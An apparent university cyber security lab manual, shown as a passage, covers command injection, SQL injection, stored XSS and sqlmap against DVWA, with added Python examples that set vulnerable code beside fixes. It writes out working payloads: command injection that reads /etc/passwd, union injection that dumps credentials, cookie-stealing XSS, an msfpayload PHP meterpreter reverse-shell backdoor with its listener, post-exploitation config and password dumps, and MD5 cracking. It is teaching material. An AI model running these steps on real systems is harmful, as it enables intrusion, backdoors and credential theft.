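    for t in ("192.168.1.106", "192.168.1.106; cat /etc/passwd"):
        print(repr(t))
        print("  shell would run :", vulnerable_command_string(t))
        print("  loose regex says:", bool(LOOSE_IP_RE.search(t)))
        print("  strict check    :", is_valid_ip(t))
```

Even with the regex anchored and the dots escaped, validation alone is the weaker half of the fix; removing the shell from the call is what makes the remaining input unable to become a command.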

Copy the /etc/passwd file to /tmp

Instructions:
0. 192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Note:
 Here we are not only displaying the contents of /etc/passwd on
the webpage, but also we are copying the /etc/passwd file to
the /tmp directory.


Practical: 6
Aim: Manual SQL injection using DVWA

2) Background Information

 What is Damn Vulnerable Web App (DVWA)?

o Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application
that is damn vulnerable.
o Its main goals are to be an aid for security professionals to test their skills and
tools in a legal environment, help web developers better understand the
processes of securing web applications and aid teachers/students to
teach/learn web application security in a class room environment.

 What is a SQL Injection?


o SQL injection (also known as SQL fishing) is a technique often used to attack
data driven applications.
o This is done by including portions of SQL statements in an entry field in an
attempt to get the website to pass a newly formed rogue SQL command to
the database (e.g., dump the database contents to the attacker). SQL
injection is a code injection technique that exploits a security vulnerability
in an application's software.
o The vulnerability happens when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input is
not strongly typed and unexpectedly executed. SQL injection is mostly known
as an attack vector for websites but can be used to attack any type of SQL
database.

 What is SQL Injection Harvesting?

o SQL Injection Harvesting is where a malicious user supplies SQL statements
to render sensitive data such as usernames, passwords, database tables, and
more.

After logging into BackTrack, log into DVWA to perform manual SQL injection.

Section 1: Manual SQL Injection

1. SQL Injection Menu
o Instructions:
1. Select "SQL Injection" from the left navigation menu.


2. Basic Injection

o Instructions:
1. Input "1" into the text box.
2. Click Submit.

3. Note, the webpage/code is supposed to print ID, First name, and Surname
to the screen.
o Notes(FYI):
 Below is the PHP select statement that we will be exploiting,
specifically $id.
 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Always True Scenario

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or '0'='0
1. Click Submit
Notes(FYI):
 In this scenario, we are saying display all records that are false
and all records that are true.
 %' - Will probably not be equal to anything, and will be false.
 '0'='0' - Is equal to true, because 0 will always equal 0.
 Database Statement
 mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
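The always-true scenario works only because $id is pasted into the statement text. The example below, added for this manual and not DVWA code, puts the concatenated query next to a parameterised one over the same data so the difference is visible: DVWA runs on MySQL, but the example uses Python's built-in sqlite3 so it runs offline, with a small users table constructed for the example. The MySQL-specific parts of the later payloads (the # comment, version(), information_schema) are not reproduced, so only the always-true input is exercised.

```python
"""DVWA's user lookup with string concatenation beside a parameterised version.

Added example for this manual, not DVWA code.  lookup_vulnerable() builds the
statement the way $getid does, so the input %' or '0'='0 becomes SQL and
matches every row; lookup_safe() binds the same input as a parameter, where it
is compared as one literal value and matches nothing.  Uses sqlite3 in memory
with constructed rows and placeholder hashes.
"""
import sqlite3
from typing import List, Tuple

ALWAYS_TRUE_INPUT = "%' or '0'='0"


def make_db() -> sqlite3.Connection:
    """In-memory users table shaped like DVWA's; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "Ada", "Lovelace", "ada", "<hash-1>"),
            (2, "Grace", "Hopper", "grace", "<hash-2>"),
            (3, "Alan", "Turing", "alan", "<hash-3>"),
            (4, "Claude", "Shannon", "claude", "<hash-4>"),
            (5, "Edsger", "Dijkstra", "edsger", "<hash-5>"),
        ],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Mirrors $getid = "SELECT ... WHERE user_id = '$id'": input becomes SQL syntax."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Same query with a bound parameter: the input can only ever be a value."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for uid in ("1", ALWAYS_TRUE_INPUT):
        print(repr(uid),
              "concatenated:", len(lookup_vulnerable(db, uid)), "rows;",
              "parameterised:", len(lookup_safe(db, uid)), "rows")
```

For an ordinary id both functions return the same single row; the parameterised form changes nothing for legitimate input, it only removes the path by which input becomes syntax.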

Display Database Version

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, version() #
1. Click Submit

Notes(FYI):
 Notice in the last displayed line, 5.1.60 is displayed in the surname.
 This is the version of the mysql database.

Display Database User

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, user() #
Notes(FYI):
 Notice in the last displayed line, root@localhost is displayed in the
surname.
 This is the name of the database user that executed the behind the
scenes PHP code.

Display Database Name

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, database() #
Notes(FYI):
 Notice in the last displayed line, dvwa is displayed in the
surname. This is the name of the database.

Display all tables in information_schema

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null, table_name
from information_schema.tables #
1. Click Submit
Notes(FYI):
 Now we are displaying all the tables in the information_schema
database.
 The INFORMATION_SCHEMA is the information database, the
place that stores information about all the other databases that the
MySQL server maintains.


Display all the user tables in information_schema

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%' #
1. Click Submit
Notes(FYI):
 Now we are displaying all the tables that start with the prefix "user" in
the information_schema database.


Display all the columns fields in the information_schema user table

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
1. Click Submit
Notes(FYI):
 Now we are displaying all the columns in the users table.
 Notice there are a user_id, first_name, last_name, user and
Password column.

Display all the columns field contents in the information_schema user table

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
1. Click Submit
Notes(FYI):
 Now we have successfully displayed all the necessary
authentication information into this database.


Section 2: Create Password Hash File

1. Create Password Hash File
o Instructions:
1. Highlight both admin and the password hash
2. Right Click
3. Copy

2. Open Notepad
o Instructions:
1. Applications --> Wine --> Programs --> Accessories --> Notepad

3. Paste in Notepad
o Instructions:
1. Edit --> Paste

4. Format in Notepad
o Instructions:
1. Place a ":" immediately after admin
2. Make sure your cursor is immediately after the ":" and hit the
delete button.
3. Now you should see the user admin and the password hash separated
by a ":" on the same line.
4. Cut the username and password combinations for gordonb, 1337,
pablo, and smitty from (Section 11, Step 1) and paste in this file as
well.

Save in Notepad

o Instructions:
1. Navigate to --> /pentest/passwords/john
2. Name the file name --> dvwa_password.txt
3. Click Save

Section 3: Proof of Lab Using John the Ripper

1. Proof of Lab
o Instructions:
1. Bring up a new terminal, see (Section 7, Step 1)
2. cd /pentest/passwords/john
3. ./john --format=raw-MD5 dvwa_password.txt
4. date
5. echo "Your Name"
 Replace the string "Your Name" with your actual name.
 e.g., echo "John Gray"
o Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle


Practical: 7
Aim: Web XSS using DVWA

Section 1: Fix Stored Cross Site Scripting (XSS) Comment Box

1. Fix Character Limit
o Instructions:
1. cd /var/www/html/dvwa/vulnerabilities/xss_s/
2. vi index.php
3. Continue to Next Step
o Notes(FYI):
1. By default, the comment box in the XSS stored GUI will only allow
for 50 characters. So we are going to change the character limit to 250
characters to demonstrate the following attacks.

2. Search for mtxMessage
o Instructions:
1. Press the "/" key
 This will put you in search mode in the bottom left part of the
screen.
2. Type "mtxMessage" and hit <Enter>


3. Replace number

o Instructions:
1. Your cursor should now be on the "m" on the word mtxMessage.
2. Right Arrow over to the 5 after maxlength.
3. Press "i" and type "2"
 This will place the number 2 in front of the number 50.
4. Press the <Esc> key
5. Type ":wq!"

After this step, configure the BackTrack virtual machine settings as follows:

1. Edit BackTrack Virtual Machine Settings
o Instructions:
1. Highlight BackTrack5R1
2. Click Edit virtual machine settings
2. Edit Network Adapter
o Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Do not Click on the OK Button

Now, log into BackTrack, open a console terminal and retrieve the IP address.

Section 2: Login to DVWA

1. Start Firefox
o Instructions:
1. Click on Firefox
2. Enable JavaScript (Part 1)
o Notes(FYI):
 Typically, JavaScript popup boxes are disabled by default. The next
two steps enable JavaScript popup boxes.
Instructions:
0. Edit --> Preferences


Enable JavaScript (Part 2)

Instructions:
0. Click on Content
1. Uncheck Block pop-up windows
2. Check Enable JavaScript
3. Click the Close Button

Login to DVWA

Notes(FYI):
 Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3,
Step 3).
Instructions:
0. Start up Firefox on BackTrack
1. Place http://192.168.1.106/dvwa/login.php in the address bar.
2. Login: admin
3. Password: password
4. Click on Login


Section 3: Set Security Level

1. Set DVWA Security Level
o Instructions:
1. Click on DVWA Security, in the left hand menu.
2. Select "low"
3. Click Submit


Section 4: XSS Stored Basic Exploit Test

1. XSS Stored Menu
o Instructions:
1. Select "XSS Stored" from the left navigation menu.

2. Basic XSS Test
o Instructions:
1. Name: Test 1
2. Message: <script>alert("This is a XSS Exploit Test")</script>
3. Click Sign Guestbook


3. View Test 1 Results
o Notes(FYI):
1. Notice that the JavaScript alert we just created is now displayed.
2. Every time a user comes to this forum, this XSS exploit will be
displayed.
3. This exploit can be easily modified to capture cookie/session
information for future Man-in-the-Middle attacks.
o Instructions:
1. Click OK

Section 5: XSS Stored IFRAME Exploit Test

1. Reset Database
o Instructions:
1. Select "Setup" from the left menu navigation.
2. Click on the Create / Reset Database Button.
o Notes(FYI):
We need to reset the database, otherwise each XSS exploit will
appear in every example.

XSS Stored Menu
Instructions:
0. Select "XSS Stored" from the left navigation menu.

XSS Test 2

Instructions:
0. Name: Test 2
1. Message: <iframe src="http://www.cnn.com"></iframe>
2. Click Sign Guestbook

View Test 2 Results

Notes(FYI):
0. Notice that CNN is displayed under "Test 2's" Message.
 This is a powerful exploit because a user could use SET to
create Malicious cloned website and place in here.
 e.g., Social Engineering Toolkit (SET): Lesson 3:
Create Malicious Weblink, Install Virus, Capture
Forensic Images

Section 6: XSS Stored COOKIE Exploit Test

1. Reset Database
o Instructions:
1. Select "Setup" from the left menu navigation.
2. Click on the Create / Reset Database Button.
o Notes(FYI):
We need to reset the database, otherwise each XSS exploit will
appear in every example.


XSS Stored Menu

Instructions:
0. Select "XSS Stored" from the left navigation menu.

XSS Test 3

Instructions:
0. Name: Test 3
1. Message: <script>alert(document.cookie)</script>
2. Click Sign Guestbook


View Cookie

Notes(FYI):
0. Below is the cookie/session that the webserver establishes with the
current browser session.
1. An attacker could easily modify this XSS script to send the cookie to a
remote location instead of displaying it.
2. Imagine if this was a bank website. Every time a user logs in, their cookie
information could be sent to a remote location.
Instructions:
0. Click OK.
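Test 1 and Test 3 both succeed for one reason: the guestbook stores the message and later writes it into the page unchanged. The example below, added for this manual and not DVWA code, renders constructed guestbook entries two ways, the unsafe concatenation that the low-security page effectively does and an output-encoded version using html.escape, so the same stored <script> text is displayed as characters rather than run. It also builds a Set-Cookie header with the HttpOnly flag, which is what stops the document.cookie reader from Test 3 from seeing the session id even where an injection does get through. PHPSESSID is PHP's default session cookie name; the entries are constructed for the example.

```python
"""Output encoding and HttpOnly session cookies against stored XSS.

Added example for this manual, not DVWA code.  render_unsafe() writes stored
text into HTML unchanged; render_safe() HTML-encodes it at output time;
session_cookie_header() sets the flags that keep document.cookie from
exposing the session id.  Guestbook entries are constructed.
"""
from html import escape
import re
from typing import List, Tuple

# Constructed entries: the two payloads from this lab plus an ordinary comment.
ENTRIES: List[Tuple[str, str]] = [
    ("Test 1", '<script>alert("This is a XSS Exploit Test")</script>'),
    ("Test 3", "<script>alert(document.cookie)</script>"),
    ("Alice", 'Nice site & "thanks"'),
]


def render_unsafe(entries: List[Tuple[str, str]]) -> str:
    """Stored text goes into the page as-is: any markup in it becomes live markup."""
    return "\n".join(f"<p><b>{name}</b>: {msg}</p>" for name, msg in entries)


def render_safe(entries: List[Tuple[str, str]]) -> str:
    """Encode at output time; escape() rewrites < > & and both quote characters."""
    return "\n".join(
        f"<p><b>{escape(name)}</b>: {escape(msg)}</p>" for name, msg in entries
    )


def contains_active_script(html: str) -> bool:
    """Does the rendered output contain a real <script> tag?"""
    return re.search(r"<script\b", html, re.IGNORECASE) is not None


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Set-Cookie line for the PHP session id with HttpOnly, SameSite and Secure."""
    # PHP session ids are alphanumeric (plus ',' and '-'); refuse anything else.
    if not re.fullmatch(r"[A-Za-z0-9,-]{16,128}", session_id):
        raise ValueError("session id has unexpected characters")
    attrs = [f"PHPSESSID={session_id}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")      # only ever sent over HTTPS
    return "Set-Cookie: " + "; ".join(attrs)


if __name__ == "__main__":
    print("--- unsafe ---")
    print(render_unsafe(ENTRIES))
    print("--- safe ---")
    print(render_safe(ENTRIES))
    print(session_cookie_header("a1b2c3d4e5f6g7h8i9j0klmnop"))
```

Raising the maxlength of the comment box, as Section 1 does, shows that a client-side limit is not a control at all; encoding at the point of output is what makes the stored text inert regardless of its length.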


1. Open a console terminal
o Instructions:
1. Click on the console terminal

2. Create msfpayload
o Notes(FYI):
 Replace 192.168.1.105 with your BackTrack IP Address obtained from
(Section 7, Step 2).
Instructions:
0. mkdir -p /root/backdoor
1. cd /root/backdoor
2. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105
LPORT=4444 R > FORUM_BUG.php
3. ls -l FORUM_BUG.php

Edit FORUM_BUG.php

Instructions:
0. vi FORUM_BUG.php


Remove the "#" character

Instructions:
0. Press "x" to delete the "#" character on the first line.
1. Press <Esc>
2. Type ":wq!"

Section 8: Upload PHP Payload

1. Upload Menu
o Instructions:
1. Select "Upload" from the left navigation menu.
2. Click Browse


2. Navigate to FORUM_BUG.php
o Instructions:
1. Click on root
2. Click on FORUM_BUG.php
3. Select Open

3. Upload FORUM_BUG.php
o Instructions:
1. Click the Upload button


Section 9: Start PHP Payload Listener

1. Open a console terminal
o Instructions:
1. Click on the console terminal

2. Start msfconsole
o Instructions:
1. msfconsole

3. Start PHP Listener
o Notes(FYI):
 Replace 192.168.1.105 with the BackTrack IP Address obtained from
(Section 7, Step 2).
Instructions:
0. use exploit/multi/handler
1. set PAYLOAD php/meterpreter/reverse_tcp
2. set LHOST 192.168.1.105
3. set LPORT 4444
4. exploit
5. Continue to Next Section

Section 10: XSS Stored window.location Exploit Test

1. Reset Database
o Instructions:
1. Select "Setup" from the left menu navigation.
2. Click on the Create / Reset Database Button.
o Notes(FYI):
We need to reset the database, otherwise each XSS exploit will
appear in every example.

XSS Stored Menu


Instructions:
0. Select "XSS Stored" from the left navigation menu.

XSS Test 4

[Enrollment No] Page 72


Cyber Security 3150714
Instructions:
0. Name: Test 4
1. Message:
 <script>window.location="http://192.168.1.106/dvwa/
hackable/upl oads/FORUM_BUG.php" </script>
 Replace 192.168.1.106 with the IP Address obtain from
Fedora 14 in (Section 3, Step 3).
2. Click Sign Guestbook
3. Click OK when the Test 1 Message is displayed
4. Continue To Next Section

Viewing XSS Test 3 Results


Instructions:
0. Notice how the "Connecting..." appears to be in an infinite loop.
1. This will continue for the duration of the PHP/MSF PAYLOAD
exploit.
2. Continue To Next Section

Section 11: View Metasploit Session

1. View Metasploit Session
o Notes(FYI):
1. Notice that BackTrack now has a connection into the Fedora 14
Webserver.
2. Continue to Next Step.

2. Establishing a Shell
o Instructions:
1. shell
 Establishes a "sh" shell.
2. tail /etc/passwd
 This produces a potential prospect list for an ssh brute force
attack.

3. Find Configuration Files
o Instructions:
1. whoami
 Displays the name of the user the webserver (and therefore this
shell) is running as.
2. grep apache /etc/passwd
 The goal of this command is obtaining the home directory for
the apache username.
3. find /var/www/* -print | grep config
 This finds all the configuration files under the /var/www
directory.

4. Exploit the Configuration File
o Instructions:
1. grep "db_" /var/www/html/dvwa/config/config.inc.php
 This produces the database name, username, and password
information to log into the mysql database. Replace dvwaPASSWORD in
the commands below with the db_password value shown here.
2. echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
 This command produces a table list of the dvwa database.
3. echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
 This command describes the columns of the users table in the
dvwa database.
4. echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
 This command displays the user and password information for
each user in the dvwa.users table.
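Step 4 returns each user's password hash, and DVWA stores those as unsalted MD5, so the next thing an attacker does with the dump is an offline dictionary attack. The following is an added example, not part of the lab manual: it runs that attack against a constructed dump, shows how identical digests reveal password reuse before any cracking happens, and contrasts the result with per-user-salted PBKDF2 storage. The rows and wordlist are constructed; the two MD5 literals in the dump are the genuine digests of 'password' and 'abc123'.

```python
"""Added example, not part of the lab manual: what "cracking the hash"
looks like for the rows returned by
    select user,password from dvwa.users;
DVWA stores unsalted MD5, so an offline dictionary attack costs one MD5
per candidate word for all users at once.  The dumped rows and wordlist
below are constructed for this example (the two MD5 literals are the
genuine digests of 'password' and 'abc123'); the PBKDF2 half shows what a
per-user salt and a slow KDF change about the attacker's work.
"""
import hashlib
import hmac
import os
from collections import defaultdict

# Constructed to look like the mysql output of the query above.
DUMPED_ROWS = [
    ("admin",   "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("gordonb", "e99a18c428cb38d5f260853678922e03"),
    ("smithy",  "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("pablo",   hashlib.md5(b"not-in-any-wordlist-7f3a").hexdigest()),
]

# Constructed wordlist; a real attack would use rockyou.txt or similar.
WORDLIST = ["123456", "password", "letmein", "qwerty", "abc123", "dvwa", "admin"]


def md5_dictionary_attack(rows, wordlist):
    """Hash each candidate once and look every user's digest up in the
    result: len(wordlist) MD5 computations no matter how many users."""
    table = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {user: table.get(digest) for user, digest in rows}


def shared_password_groups(rows):
    """Unsalted hashing leaks password reuse before any cracking starts:
    identical digests mean identical passwords."""
    by_digest = defaultdict(list)
    for user, digest in rows:
        by_digest[digest].append(user)
    return [users for users in by_digest.values() if len(users) > 1]


# --- the defender's alternative: per-user salt plus an iterated KDF ---
ITERATIONS = 20_000   # deliberately low so the demo runs quickly


def pbkdf2_store(password, salt=None):
    """Return 'salthex$digesthex' for storage; fresh random salt per user."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def pbkdf2_verify(password, stored):
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def pbkdf2_dictionary_attack(stored_rows, wordlist):
    """With per-user salts there is no shared lookup table: each (user,
    guess) pair costs a full ITERATIONS-round PBKDF2.  Returns the cracked
    passwords and the number of KDF evaluations spent."""
    found, work = {}, 0
    for user, stored in stored_rows:
        found[user] = None
        for word in wordlist:
            work += 1
            if pbkdf2_verify(word, stored):
                found[user] = word
                break
    return found, work


if __name__ == "__main__":
    print("md5:", md5_dictionary_attack(DUMPED_ROWS, WORDLIST))
    print("reuse:", shared_password_groups(DUMPED_ROWS))
    stored = [("admin", pbkdf2_store("password")), ("pablo", pbkdf2_store("zzz-nope"))]
    print("pbkdf2:", pbkdf2_dictionary_attack(stored, WORDLIST))
```

Salting does not make a weak password safe; "password" still falls on the second guess. What changes is that the attacker can no longer amortise one hash over every user and every leaked database, and each guess costs ITERATIONS times more than an MD5.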

5. Record the Results in xss.html
o Instructions:
1. echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 Place the html <pre> tag in the xss.html file.
 The <pre> tag preserves the column layout of the mysql output.
2. echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
 Place the user and password rows of the dvwa.users table in the
xss.html file.
3. echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 Place the closing html </pre> tag in the xss.html file.
4. echo "<br>Your Name<br>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 Replace the string "Your Name" with your actual name.
5. date >> /var/www/html/dvwa/hackable/uploads/xss.html
 Appends the current date and time as a timestamp for the submission.


Practical: 8
Aim: Automated SQL injection with SqlMap

Sqlmap is one of the most popular and powerful SQL injection automation tools available.
Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and extract
database names, tables, columns and all of the data in the tables. Under certain conditions
(for example the FILE privilege on MySQL) it can even read and write files on the remote
file system. Written in Python, it is one of the most powerful hacking tools out there; sqlmap
is the Metasploit of SQL injection.

1) Vulnerable Urls

Let's say there is a web application or website that has a url in it like this

http://www.site.com/section.php?id=51

and it is prone to sql injection because the developer of that site did not properly escape the
parameter id. This can be simply tested by trying to open the url

http://www.site.com/section.php?id=51'

We just added a single quote to the parameter. If this url throws an error or reacts in an
unexpected manner, it is clear that the database received the unexpected single quote, which
the application did not escape properly, so the input parameter "id" is vulnerable to sql
injection. The reverse does not hold: a page that shows no error may still be injectable.
Blind injection shows up only as a change in the response content or in how long the response
takes, which is exactly what sqlmap's boolean-based and time-based tests look for.

2) Hacking with sqlmap

Now it's time to move on to sqlmap to hack such urls. The sqlmap command is run from the
terminal with the python interpreter.

python sqlmap.py -u "http://www.site.com/section.php?id=51"

The above is the first and most simple command to run with the sqlmap tool. It checks the
input parameters to find out whether they are vulnerable to sql injection or not. For this sqlmap
sends different kinds of sql injection payloads to the input parameter and checks the output. In
the process sqlmap is also able to identify the remote system OS, database name and version.
Here is what the output might look like

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the operating system, web server and database along with
version information. Even this much is pretty impressive. The "resuming" line and the "0
HTTP(s) requests" count mean this output was captured on a repeat run: sqlmap saves what it
learns about a target in a session file and reuses it, so the first run against a new target
sends many more requests than this. But it's time to move on and see what more this tool is
capable of.

3) Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable, the
next step is to find out the names of the databases that exist on the remote system. The
"--dbs" option is used to get the database list.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs

The output could be something like this

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

The output shows the existing databases on the remote system. information_schema is MySQL's
own catalogue and is present on every server; the application's data lives in safecosmetics.

4) Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of
interest over here is 'safecosmetics'.

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables

Isn't this amazing? It is, of course. Let's get the columns of a particular table now.

5) Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of
some important table. Let's say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

So now the columns are clearly visible. Good job!

6) Get data from a table

Now comes the most interesting part: extracting the data from the table. The command would be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the
mysqldump command. The output might look similar to this

+----+--------------------+-------+---------+----------+------------+-------------+-------------------+
| id | hash               | name  | email   | password | permission | system_home | system_allow_only |
+----+--------------------+-------+---------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-------+---------+----------+------------+-------------+-------------------+

The hash column seems to hold the password hash. Cracking that hash would give you the login
details right away. sqlmap also writes the dumped table to a CSV file under its output directory
for easy analysis.
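Sections 1) to 6) above describe a procedure that sqlmap performs over HTTP against a remote MySQL server. The following is an added example, written for this manual and not taken from sqlmap, that reproduces the procedure against an in-memory SQLite database so it runs offline: the single-quote test and the boolean differential from sections 1) and 2), then the UNION-based schema and data extraction behind --tables, --columns and --dump from sections 3) to 6), each run against both a vulnerable and a fixed version of section.php. The application, its tables and the stored hash are constructed for the example.

```python
"""Added example, not part of the lab manual and not sqlmap's own code.

It reproduces, against an in-memory SQLite database, the two things the
practical leans on: (1) why appending a quote to the id parameter exposes
the bug, and how a tool decides a parameter is injectable from response
differences alone (the boolean-based idea behind sqlmap's detection); and
(2) what --tables, --columns and --dump do underneath, which is to bolt a
UNION SELECT onto the injectable query and read the schema catalogue
(sqlite_master and pragma_table_info() here, information_schema on MySQL)
and then the rows.  The 'section' application, its tables and the stored
hash are constructed for this example.
"""
import sqlite3


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sections(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO sections VALUES (51, 'Skin care');
        CREATE TABLE users(id INTEGER, name TEXT, hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5DIpzzDHFOwnCvPonu');
    """)
    return db


# --- section.php?id=<value>, as the vulnerable site would implement it ---
def section_page_vulnerable(db, id_param):
    """Returns (status, body).  The parameter is concatenated into the SQL."""
    sql = "SELECT title FROM sections WHERE id = " + id_param
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as err:
        return 500, f"Database error: {err}"
    return 200, "\n".join(r[0] for r in rows)


def section_page_fixed(db, id_param):
    """Validates the type and binds the value; input cannot alter the statement."""
    try:
        section_id = int(id_param)
    except ValueError:
        return 400, "Bad request"
    rows = db.execute("SELECT title FROM sections WHERE id = ?",
                      (section_id,)).fetchall()
    return 200, "\n".join(r[0] for r in rows)


# --- step 1: the manual single-quote test from section 1) ---
def quote_test(page, db, value):
    """True when id=51' reaches the database unescaped and breaks the query."""
    status, body = page(db, value + "'")
    return status == 500 and "database error" in body.lower()


# --- step 2: what a scanner automates: a boolean differential ---
def boolean_injectable(page, db, value):
    """Injectable if 'AND 1=1' leaves the page unchanged but 'AND 1=2'
    changes it: the database evaluated our expression.  Works even when
    no error text is ever shown (blind injection)."""
    baseline = page(db, value)
    true_case = page(db, value + " AND 1=1")
    false_case = page(db, value + " AND 1=2")
    return true_case == baseline and false_case != baseline


# --- step 3: enumeration through UNION, the --tables/--columns/--dump path ---
def union_extract(page, db, value, select_expr, from_clause):
    """Suppress the real row with AND 1=2, then append our own SELECT so
    its results come back in the page body, one per line."""
    payload = f"{value} AND 1=2 UNION SELECT {select_expr} {from_clause}"
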